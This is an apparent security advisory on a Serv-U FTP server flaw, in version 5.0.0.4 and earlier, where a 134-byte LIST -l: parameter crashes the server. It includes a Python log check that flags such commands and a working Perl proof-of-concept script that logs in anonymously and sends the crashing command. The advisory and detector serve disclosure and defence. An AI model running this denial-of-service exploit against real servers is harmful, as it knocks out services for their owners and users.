Serv-U LIST -l Parameter Buffer Overflow

Summary

Serv-U is a "powerful, easy-to-use, award-winning FTP server" created by Rob Beckers. A vulnerability in the product allows a remote user to crash the server by sending a malformed LIST command.

Credit:

SecuriTeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable Systems:
 * Serv-U version 5.0.0.4 and prior

Immune Systems:
 * Serv-U 5.0.0.6 and newer

A user who supplies a long parameter (around 134 bytes) to the -l: option of the LIST command can cause the server to read from an address outside the Serv-U process's memory. This triggers an unhandled exception, which in turn crashes the program.
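A defender watching the FTP control channel can spot the condition described above before (or after) a crash by measuring the length of the -l: argument on LIST commands. The following Python check is an added example, not part of the SecuriTeam advisory or the original proof of concept; the log line format and the sample lines are constructed assumptions, and the 134-byte threshold is the size the advisory associates with the crash.

```python
"""Flag oversized LIST -l: parameters in constructed FTP command-log lines."""
import re
from typing import Dict, List

# Parameter length the advisory associates with the unhandled exception.
LIST_PARAM_THRESHOLD = 134

# Assumed log format: "<date> <time> <client-ip> > <command>" (constructed, not Serv-U's own).
_LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\d+\.\d+\.\d+\.\d+) > (?P<cmd>.*)$")
# A LIST command carrying the -l: option; the argument runs to the next whitespace.
_LIST_RE = re.compile(r"^LIST\s+-l:(?P<arg>\S*)", re.IGNORECASE)


def list_param_length(cmd: str) -> int:
    """Length of the -l: argument of a LIST command, or -1 if cmd is not 'LIST -l:...'."""
    m = _LIST_RE.match(cmd.strip())
    return len(m.group("arg")) if m else -1


def find_oversized_list(lines: List[str], threshold: int = LIST_PARAM_THRESHOLD) -> List[Dict[str, object]]:
    """Return one record per logged LIST -l: command whose argument is at least `threshold` bytes."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = _LOG_RE.match(line.rstrip("\r\n"))
        if not m:
            continue  # not a command line we understand; skip rather than guess
        n = list_param_length(m.group("cmd"))
        if n >= threshold:
            hits.append({"ts": m.group("ts"), "ip": m.group("ip"), "length": n})
    return hits


# Constructed sample session: a normal listing, one crash-sized parameter, one long but benign one.
SAMPLE_LOG = [
    "2004-05-01 10:00:01 192.168.1.10 > USER anonymous",
    "2004-05-01 10:00:02 192.168.1.10 > PASS a@b.com",
    "2004-05-01 10:00:03 192.168.1.10 > LIST -l:pub",
    "2004-05-01 10:00:04 192.168.1.10 > LIST -l:" + "A" * 134,
    "2004-05-01 10:00:05 192.168.1.11 > LIST -l:" + "B" * 60,
]

if __name__ == "__main__":
    for hit in find_oversized_list(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} LIST -l: parameter of {hit['length']} bytes")
```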

Exploit:
#!/usr/bin/perl
# Proof of concept from the advisory: logs in anonymously, then sends a LIST
# command whose -l: parameter is 134 bytes long. Quoting and escape sequences
# were lost in the original listing and are restored here.

use IO::Socket;

$host = '192.168.1.243';

$remote = IO::Socket::INET->new ( Proto => 'tcp',
     PeerAddr => $host,
     PeerPort => '2116',
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
# Read the banner until the 220 greeting arrives.
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

# Wait for 331 (password required).
while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join('', 'PASS ', 'a@b.com', "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

# Wait for 230 (logged in).
while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

# The malformed command: LIST with a 134-byte -l: parameter.
$ftp = join('', 'LIST -l:', 'A' x 134, "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

# A vulnerable server never answers; a patched one completes the listing.
while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;

Categories: Windows